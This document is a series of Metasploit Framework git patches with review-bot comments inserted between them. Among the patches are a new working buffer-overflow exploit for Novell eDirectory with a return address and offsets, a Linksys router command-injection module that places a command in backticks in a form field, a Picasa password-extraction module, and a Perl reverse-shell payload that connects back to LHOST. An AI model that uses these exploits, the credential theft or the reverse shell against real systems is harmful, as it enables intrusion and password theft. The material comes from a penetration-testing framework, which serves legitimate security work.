specialitems.add("SMBUser"); + specialitems.add("SMBPass"); return new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { diff --git a/external/source/armitage/src/ui/ZoomableImage.java b/external/source/armitage/src/ui/ZoomableImage.java index 346438e15e2f..466f2c56d397 100644 --- a/external/source/armitage/src/ui/ZoomableImage.java +++ b/external/source/armitage/src/ui/ZoomableImage.java @@ -54,6 +54,8 @@ public void mouseReleased(MouseEvent ev) { check(ev); } }); + + setHorizontalAlignment(SwingConstants.CENTER); } protected void updateIcon() { 
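Review bot: `NetworkTable.addNode` still guards with `if (id == null || label == null)`, but the value it now dereferences is `description` (`description.indexOf(id)`), which the guard does not cover. A null description therefore throws where the old code returned null. Extend the guard: `if (id == null || label == null || description == null) return null;`. `NetworkGraph.addNode` in the same commit calls `label.length()` and `description.length()` with no null check, so the two implementations of the same interface disagree on null arguments. The method body continues outside the hunk.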
diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index 5ea39884dd68..c1e03e579b70 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,32 @@ Armitage Changelog ================== +23 Jan 13 (tested against msf 16351) +--------- +- Added helpers to set EXE::Custom and EXE::Template options. +- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts +- Cleaned up Armitage -> SOCKS Proxy job management code. The code to + check if a proxy server is up was deadlock prone. Removed it. +- Starting SOCKS Proxy module now opens a tab displaying the module + start process. An event is posted to the event log too. +- Created an option helper to select credentials for SMBUser, SMBPass, + USERNAME, and PASSWORD. +- Added a feature to label hosts. A label will show up in its own column + in table view or below all info in graph view. Any team member may + change a label through [host] -> host -> Set Label. You may also use + dynamic workspaces to show hosts with certain labels attached. +- Fixed bad things happening when connecting Armitage to 'localhost' and + not '127.0.0.1'. +- Screenshots and Webcam shots are now centered in their tab. +- Added an alternate .bat file to start msfrpcd on Windows in the + Metasploit 4.5 installer's environment. +- Added a color-style for [!] warning messages + +Cortana Updates (for scripters) +-------- +- &handler function now works as advertised. +- Cortana now avoids use of core.setg + 4 Jan 13 (tested against msf 16252) -------- - Added a helper to set REXE option From 933f8077450393465bb7e2d0244b5c06d75d0792 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 22 Jan 2013 23:53:00 -0600 Subject: [PATCH 105/421] Msftidy cleanup + handling return values better --- .../gather/credentials/enum_picasa_pwds.rb | 59 +++++++++---------- 1 file changed, 27 insertions(+), 32 deletions(-) 
diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index 5ec210987d0b..8977cbcc5e33 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -19,18 +19,18 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Google Picasa Password Extractor', + 'Name' => 'Windows Gather Google Picasa Password Extractor', 'Description' => %q{ This module extracts and decrypts the login passwords stored by Google Picasa. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'SecurityXploded Team', #www.SecurityXploded.com 'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>', ], - 'Platform' => [ 'win' ], + 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end @@ -70,14 +70,12 @@ def decrypt_password(data) end def get_registry - + begin print_status("Looking in registry for stored login passwords by Picasa ...") - username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", - 'GaiaEmail') - password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", - 'GaiaPass') + username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaEmail') || '' + password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaPass') || '' credentials = Rex::Ui::Text::Table.new( 'Header' => "Picasa Credentials", 
@@ -87,59 +85,56 @@ def get_registry "User", "Password" ]) - - + foundcreds = 0 - if username != nil and password != nil + if !username.empty? and !password.empty? passbin = [password].pack("H*") pass = decrypt_password(passbin) - if pass != nil + if pass and !pass.empty? print_status("Found Picasa 2 credentials.") - print_good("Username: #{username}\t Password: #{pass}") - + print_good("Username: #{username}\t Password: #{pass}") + foundcreds = 1 credentials << [username,pass] - end end #For early versions of Picasa3 - username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", - 'GaiaEmail') - password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", - 'GaiaPass') + username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaEmail') || '' + password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaPass') || '' - if username != nil and password != nil + if !username.empty? and !password.empty? passbin = [password].pack("H*") pass = decrypt_password(passbin) - if pass != nil + if pass and !pass.empty? print_status("Found Picasa 3 credentials.") - print_good("Username: #{username}\t Password: #{pass}") + print_good("Username: #{username}\t Password: #{pass}") foundcreds = 1 credentials << [username,pass] end end - + if foundcreds == 1 path = store_loot( - "picasa.creds", - "text/csv", - session, - credentials.to_csv, - "decrypted_picasa_data.csv", - "Decrypted Picasa Passwords") + "picasa.creds", + "text/csv", + session, + credentials.to_csv, + "decrypted_picasa_data.csv", + "Decrypted Picasa Passwords" + ) print_status("Decrypted passwords saved in: #{path}") - else + else print_status("No Picasa credentials found.") end rescue ::Exception => e - print_error("An error has occurred: #{e.to_s}") + print_error("An error has occurred: #{e.to_s}") end end From 5cfabb0443df2a2ae5d1d2a849a2100b7f8f57c9 Mon Sep 17 00:00:00 2001 
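Review bot: The `rescue ::Exception => e` that closes get_registry still wraps all of the reworked registry and decryption code, so Interrupt, SystemExit and NoMemoryError are caught and reduced to a one-line message. Rescuing `::StandardError` instead leaves Ctrl-C and shutdown working, and `#{e.to_s}` inside the string can be just `#{e}`. The Picasa 2 and Picasa 3 branches are now identical apart from the registry key and the label, so they could share one private helper that takes the version number. get_registry starts in the previous hunk, so the `begin` this rescue pairs with is not in this hunk.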
From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 00:15:09 -0600 Subject: [PATCH 106/421] Apply the changes I suggested before --- .../http/coldfusion_locale_traversal.rb | 22 ++++++++----------- 1 file changed, 9 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb index 06874e30c7ee..caa420175688 100644 --- a/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb +++ b/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb @@ -49,8 +49,8 @@ def initialize register_options( [ - OptString.new('FILE', [ false, 'File to retrieve (make sure path/file match OS (ie, /etc/passwd on Windows == dumb))', '']), - OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false]), + OptString.new('FILE', [ false, 'File to retrieve', '']), + OptBool.new('FINGERPRINT', [true, 'Only fingerprint endpoints', false]) ], self.class) end @@ -115,7 +115,8 @@ def run_host(ip) 'method' => 'GET', 'Connection' => "keep-alive", 'Accept-Encoding' => "zip,deflate", - }, 10) + }) + return if not res or not res.body or not res.code if (res.code.to_i == 200) @@ -172,19 +173,19 @@ def run_host(ip) 'Connection' => "keep-alive", 'Accept-Encoding' => "zip,deflate", }, - }, -1) + }) if (res.nil?) print_error("no response for #{ip}:#{rport} #{url}") elsif (res.code == 200) #print_error("#{res.body}")#debug - out << "URL: #{ip}#{url}#{locale}#{trav}\n" - if match = res.body.match(/\<title\>(.*)\<\/title\>/im) + print_status("URL: #{ip}#{url}#{locale}#{trav}") + if res.body.match(/\<title\>(.*)\<\/title\>/im) fileout = $1 if(fileout !~ /Login$/ and fileout !~ /^Welcome to ColdFusion/ and fileout !~ /^Archives and Deployment/) - out << "#{ip} FILE:\n#{fileout}\r\n" - break + print_good("#{ip} FILE: #{fileout}") + break end end else 
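Review bot: In the `@@ -172,19 +173,19 @@` hunk the title match drops the `match =` assignment and reads the capture through the global `$1`, which is silently clobbered if another regex is ever evaluated between the two lines. Keeping the MatchData makes the dependency explicit: `if (m = res.body.match(/\<title\>(.*)\<\/title\>/im))` followed by `fileout = m[1]`. The captured text comes from the remote server and goes straight into `print_good`; because `(.*)` with `/m` is greedy across lines, truncating `fileout` before printing would keep an oversized page from flooding the console. run_host begins and ends outside the hunk.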
@@ -192,11 +193,6 @@ def run_host(ip) print_error("#{ip} #{res.inspect}") end end - if(out =~ /FILE/) - print_good(out) - else - print_status(out) - end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError rescue ::Timeout::Error, ::Errno::EPIPE From 9c9a0d1664f16e626943811414aa6a1253fc7f45 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 23 Jan 2013 10:51:29 +0100 Subject: [PATCH 107/421] Added module for cve-2012-0432 --- .../linux/misc/novell_edirectory_ncp_bof.rb | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb new file mode 100644 index 000000000000..12a79339b61f --- /dev/null +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb 
@@ -0,0 +1,133 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell eDirectory Buffer Overflow', + 'Description' => %q{ + This exploit abuses a buffer overflow vulnerability in Novell eDirectory. The + vulnerability exists in the ndsd daemon, specifically in the NCP service, while + parsing a specially crafted Keyed Object Login request. It allows remote code + execution with root privileges. + }, + 'Author' => + [ + 'David Klein', # Vulnerability Discovery + 'Gary Nilson', # Exploit + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0432'], + [ 'OSVDB', '88718'], + [ 'BID', '57038' ], + [ 'EDB', '24205' ], + [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=3426981' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2013/Jan/97' ] + ], + 'DisclosureDate' => 'Dec 12 2012', + 'Platform' => 'linux', + 'Privileged' => true, + 'Arch' => ARCH_X86, + 'Payload' => + { + + }, + 'Targets' => + [ + [ 'Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3', + { + 'Ret' => 0x080a4697, # jmp esi from ndsd + 'Offset' => 58 + } + ] + ], + 'DefaultTarget' => 0 + )) + + register_options([Opt::RPORT(524),], self.class) + end + + def check + connect + sock.put(connection_request) + res = sock.get + disconnect + if res.nil? 
or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 + # res[8,2] => Reply Type + # res[15,1] => Connection Status + return Exploit::CheckCode::Safe + end + return Exploit::CheckCode::Detected + end + + def connection_request + pkt = "\x44\x6d\x64\x54" # NCP TCP id + pkt << "\x00\x00\x00\x17" # request_size + pkt << "\x00\x00\x00\x01" # version + pkt << "\x00\x00\x00\x00" # reply buffer size + pkt << "\x11\x11" # cmd => create service connection + pkt << "\x00" # sequence number + pkt << "\x00" # connection number + pkt << "\x00" # task number + pkt << "\x00" # reserved + pkt << "\x00" # request code + + return pkt + end + + def exploit + + connect + + print_status("Sending Service Connection Request...") + sock.put(connection_request) + res = sock.get + if res.nil? or res[8, 2].unpack("n")[0] != 0x3333 or res[15, 1].unpack("C")[0] != 0 + # res[8,2] => Reply Type + # res[15,1] => Connection Status + fail_with(Exploit::Failure::UnexpectedReply, "Service Connection failed") + end + print_good("Service Connection successful") + + pkt = "\x44\x6d\x64\x54" # NCP TCP id + pkt << "\x00\x00\x00\x00" # request_size (filled later) + pkt << "\x00\x00\x00\x01" # version (1) + pkt << "\x00\x00\x00\x05" # reply buffer size + pkt << "\x22\x22" # cmd + pkt << "\x01" # sequence number + pkt << res[11] # connection number + pkt << "\x00" # task number + pkt << "\x00" # reserved + pkt << "\x17" # Login Object FunctionCode (23) + pkt << "\x00\xa7" # SubFuncStrucLen + pkt << "\x18" # SubFunctionCode + pkt << "\x90\x90" # object type + pkt << "\x50" # ClientNameLen + pkt << rand_text(7) + jmp_payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{target['Offset'] + 4}").encode_string + pkt << jmp_payload # first byte is the memcpy length, must be bigger than 62 to to overwrite EIP + pkt << rand_text(target['Offset'] - jmp_payload.length) + pkt << [target.ret].pack("V") + pkt << payload.encoded + + pkt[4,4] = [pkt.length].pack("N") + + print_status("Sending 
Overflow on Keyed Object Login...") + sock.put(pkt) + sock.get + disconnect + end + +end From 17d1c9f996de1bd4c7e674635f0be4a507216895 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 10:29:11 +0000 Subject: [PATCH 108/421] - expanded description - updated references --- .../multi/http/movabletype_upgrade_exec.rb | 38 ++++++++----------- 1 file changed, 16 insertions(+), 22 deletions(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 40764c27b971..6b46f40b8fc7 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -7,23 +7,6 @@ require 'msf/core' -### -# -# The vulnerability arises due to the following properties: -# -# 1: This script may be invoked remotely without requiring authentication to any MT -# instance. -# -# 2: Through a crafted POST request, it is possible to invoke particular -# database migration functions (i.e functions that bring the existing database -# up-to-date with an updated codebase) by name and with particular parameters. -# -# 3: A particular migration function, core_drop_meta_for_table, allows a class -# parameter to be set which is used directly in a perl eval statement, allowing -# perl code injection. -# -### - class Metasploit4 < Msf::Exploit::Remote include Exploit::Remote::HttpClient 
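Review bot: `check` and `exploit` both slice the reply with `res[8, 2].unpack("n")` and `res[15, 1].unpack("C")` after testing only `res.nil?`, so a truncated reply makes the slice nil and raises NoMethodError instead of reporting Safe or failing through `fail_with`. Adding a length test to both conditions, `res.nil? or res.length < 16 or ...`, treats a short reply like any other unexpected one. The same three-part condition and its two explanatory comments are repeated in both methods; a small private predicate taking `res` would keep the two copies from drifting apart.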
@@ -32,19 +15,30 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution', 'Description' => %q{ - This module can be used to execute a payload on MoveableType (MT) - thatexposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), + This module can be used to execute a payload on MoveableType (MT) that + exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), that is used during installation and updating of the platform. + The vulnerability arises due to the following properties: + 1. This script may be invoked remotely without requiring authentication + to any MT instance. + 2. Through a crafted POST request, it is possible to invoke particular + database migration functions (i.e functions that bring the existing + database up-to-date with an updated codebase) by name and with + particular parameters. + 3. A particular migration function, core_drop_meta_for_table, allows + a class parameter to be set which is used directly in a perl eval + statement, allowing perl code injection. }, 'Author' => [ 'Kacper Nowak', - 'Nick Blundell', - "Gary O'Leary-Steele", + 'Nick Blundell', + "Gary O'Leary-Steele" ], 'References' => [ - ['CVE', '2012-6315'], + #['CVE', '2012-6315'], superseded by CVE-2013-0209 (duplicate) + ['CVE', '2013-0209'], ['URL', 'http://www.sec-1.com/blog/?p=402'], ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] ], From 5d6ca30422d6c0e33af89075382428433968c3a7 Mon Sep 17 00:00:00 2001 From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 10:33:55 +0000 Subject: [PATCH 109/421] removed spaces at EOL --- modules/exploits/multi/http/movabletype_upgrade_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 6b46f40b8fc7..fb7dc3010cd5 100644 
--- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -32,7 +32,7 @@ def initialize(info = {}) 'Author' => [ 'Kacper Nowak', - 'Nick Blundell', + 'Nick Blundell', "Gary O'Leary-Steele" ], 'References' => From 3a5e92ba6ff92e1e47cdc084912b7aa12f6e0b10 Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Wed, 23 Jan 2013 12:15:34 +0100 Subject: [PATCH 110/421] hopefully all fixex included --- .../admin/http/linksys_wrt54gl_exec.rb | 113 +++++++++++++----- 1 file changed, 80 insertions(+), 33 deletions(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 85d8c93afa3c..8f270248e433 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -16,7 +16,7 @@ def initialize(info = {}) 'Name' => 'Linksys WRT54GL Remote Command Execution', 'Description' => %q{ Some Linksys Routers are vulnerable to OS Command injection. - You will need credentials to the webinterface to access the vulnerable part + You will need credentials to the web interface to access the vulnerable part of the application. Default credentials are always a good starting point. admin/admin or admin and blank password could be a first try. @@ -34,8 +34,10 @@ def initialize(info = {}) [ [ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ], + [ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ], [ 'EDB', '24202' ], [ 'BID', '57459' ], + [ 'OSVDB', '89421' ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 18 2013')) 
@@ -43,12 +45,12 @@ def initialize(info = {}) register_options( [ Opt::RPORT(80), - OptString.new('VULNPATH',[ true, 'PATH to OS Command Injection', '/apply.cgi']), - OptString.new('USER',[ true, 'User to login with', 'admin']), - OptString.new('PASS',[ true, 'Password to login with', 'password']), + OptString.new('TARGETURI',[ true, 'PATH to OS Command Injection', '/apply.cgi']), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), - OptString.new('LANIP', [ false, 'LAN IP address of the router', '<RHOST>']), + OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']), OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']), 
@@ -56,46 +58,41 @@ def initialize(info = {}) end def run - #setting up the needed variables - uri = datastore['VULNPATH'] - user = datastore['USER'] + #setting up some basic variables + uri = datastore['TARGETURI'] + user = datastore['USERNAME'] rhost = datastore['RHOST'] netmask = datastore['NETMASK'] routername = datastore['ROUTER_NAME'] wandomain = datastore['WAN_DOMAIN'] wanmtu = datastore['WAN_MTU'] - # using the RHOST for the correct lan IP settings - # WARNING: Attacks via the WAN IP are breaking the LAN configuration of the device! - if datastore['LANIP'] !~ /<RHOST>/ + if datastore['LANIP'] !~ /1.1.1.1/ + #there is a configuration from the user so we use LANIP for the router configuration ip = datastore['LANIP'].split('.') else + #no configuration from user so we use RHOST for the router configuration ip = rhost.split('.') end # not sure if this is a good way for blank passwords: - if datastore['PASS'] == "<BLANK>" + if datastore['PASSWORD'] == "<BLANK>" pass = "" else - pass = datastore['PASS'] + pass = datastore['PASSWORD'] end print_status("Trying to login with #{user} / #{pass}") - user_pass = Rex::Text.encode_base64(user + ":" + pass) - begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } - }, 25) + 'basic_auth' => "#{user}:#{pass}" + }) unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") + vprint_error("#{rhost} not responding") end return :abort if (res.code == 404) 
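Review bot: The sentinel test `datastore['LANIP'] !~ /1.1.1.1/` uses an unanchored pattern with unescaped dots, so a real address such as 1.1.1.10 or 11.1.1.1 is treated as "not configured" and RHOST is written into the router's LAN settings instead. Since the request rewrites the device's LAN address, that silently misconfigures the unit under test; a plain comparison, `if datastore['LANIP'] != '1.1.1.1'`, or a blank default checked with `datastore['LANIP'].to_s.empty?`, removes the ambiguity. LANIP is declared optional in the options hunk above, so a nil value also needs handling before `.split('.')`. Separately, the `unless (res.kind_of? Rex::Proto::Http::Response)` guard only prints and then falls through to `res.code`, which raises on a nil response; it should `return :abort`. run continues outside this hunk.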
@@ -108,16 +105,17 @@ def run end rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") + vprint_error("#{rhost} - Failed to connect to the web server") return :abort end print_status("Sending remote command: " + datastore['CMD']) - cmd = Rex::Text.uri_encode(datastore['CMD']) - #cmd = datastore['CMD'] + # cmd = Rex::Text.uri_encode(datastore['CMD']) + cmd = datastore['CMD'] - data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" + #original Post Request: +# data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" if datastore['VERBOSE'] == true print_line("using the following target URL: \n#{uri}") 
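Review bot: The previous `uri_encode` call and the whole original request body are left behind as commented-out code (`# cmd = Rex::Text.uri_encode(datastore['CMD'])` and the long `# data_cmd = ...` line), which duplicates the `vars_post` hash added in the next hunk and will go stale. Version control already keeps the old form, so both can be deleted, leaving at most a one-line comment that says why `cmd` is no longer URI-encoded by hand. `if datastore['VERBOSE'] == true` reads better as `if datastore['VERBOSE']`. run starts and ends outside this hunk.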
@@ -128,17 +126,66 @@ def run { 'uri' => uri, 'method' => 'POST', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - }, - 'data' => data_cmd, - }, 20) + 'basic_auth' => "#{pass}:#{pass}", + #'data' => data_cmd, + + 'vars_post' => + { + 'submit_button' => "index", + 'change_action' => "1", + 'submit_type' => "1", + 'action' => "Apply", + 'now_proto' => "dhcp", + 'daylight_time' => "1", + 'lan_ipaddr' => "4", + 'wait_time' => "0", + 'need_reboot' => "0", + 'ui_language' => "de", + 'wan_proto' => "dhcp", + 'router_name' => "#{routername}", + 'wan_hostname' => "`#{cmd}`", + 'wan_domain' => "#{wandomain}", + 'mtu_enable' => "1", + 'wan_mtu' => "#{wanmtu}", + 'lan_ipaddr_0' => "#{ip[0]}", + 'lan_ipaddr_1' => "#{ip[1]}", + 'lan_ipaddr_2' => "#{ip[2]}", + 'lan_ipaddr_3' => "#{ip[3]}", + 'lan_netmask' => "#{netmask}", + 'lan_proto' => "dhcp", + 'dhcp_check' => "1", + 'dhcp_start' => "100", + 'dhcp_num' => "50", + 'dhcp_lease' => "0", + 'wan_dns' => "4", + 'wan_dns0_0' => "0", + 'wan_dns0_1' => "0", + 'wan_dns0_2' => "0", + 'wan_dns0_3' => "0", + 'wan_dns1_0' => "0", + 'wan_dns1_1' => "0", + 'wan_dns1_2' => "0", + 'wan_dns1_3' => "0", + 'wan_dns2_0' => "0", + 'wan_dns2_1' => "0", + 'wan_dns2_2' => "0", + 'wan_dns2_3' => "0", + 'wan_wins' => "4", + 'wan_wins_0' => "0", + 'wan_wins_1' => "0", + 'wan_wins_2' => "0", + 'wan_wins_3' => "0", + 'time_zone' => "-08+1+1", + '_daylight_time' => '1' + }, + }) rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") + vprint_error("#{rhost} - Failed to connect to the web server") return :abort end - print_status("Blind Exploitation - wait 5 seconds until the configuration gets applied\n") + print_line("") + print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed") print_status("Blind Exploitation - unknown Exploitation state\n") end end + From f691652594e3ca9e6c035303755ace4f254d2aeb Mon Sep 17 00:00:00 2001 
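Review bot: The POST builds its credentials as `'basic_auth' => "#{pass}:#{pass}"`, while the login probe earlier in run uses `"#{user}:#{pass}"`; the two requests should authenticate as the same account, so this line should read `'basic_auth' => "#{user}:#{pass}"`. The `vars_post` values that only wrap one variable in a string (`"#{routername}"`, `"#{netmask}"`, `"#{wanmtu}"`) can be passed as the variables themselves, and the leftover `#'data' => data_cmd,` line can be removed. run starts outside this hunk.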
From: Kacper Nowak <kacper.p.nowak@gmail.com> Date: Wed, 23 Jan 2013 11:21:44 +0000 Subject: [PATCH 111/421] attempt to fix cmd/windows/reverse_perl payload --- modules/payloads/singles/cmd/windows/reverse_perl.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index 37bb01b97d3a..837e089ef689 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -48,7 +48,7 @@ def command_string lhost = datastore['LHOST'] ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" + cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"} end end From d2b75ad0058a093368a2566a561e83b82859135b Mon Sep 17 00:00:00 2001 From: booboule <booboule@gmail.com> Date: Wed, 23 Jan 2013 12:42:33 +0100 Subject: [PATCH 112/421] Update external/source/exploits/cve-2012-5088/Makefile --- external/source/exploits/cve-2012-5088/Makefile | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/external/source/exploits/cve-2012-5088/Makefile b/external/source/exploits/cve-2012-5088/Makefile index abc39b7a2c0d..226cdcd65c90 100755 --- a/external/source/exploits/cve-2012-5088/Makefile +++ b/external/source/exploits/cve-2012-5088/Makefile @@ -9,8 +9,8 @@ CLASSES = \ all: $(CLASSES:.java=.class) install: - mv Exploit.class ../../../../data/exploits/cve-2013-0422/ - mv B.class ../../../../data/exploits/cve-2013-0422/ + mv Exploit.class ../../../../data/exploits/cve-2012-5088/ + mv B.class ../../../../data/exploits/cve-2012-5088/ clean: rm -rf *.class 
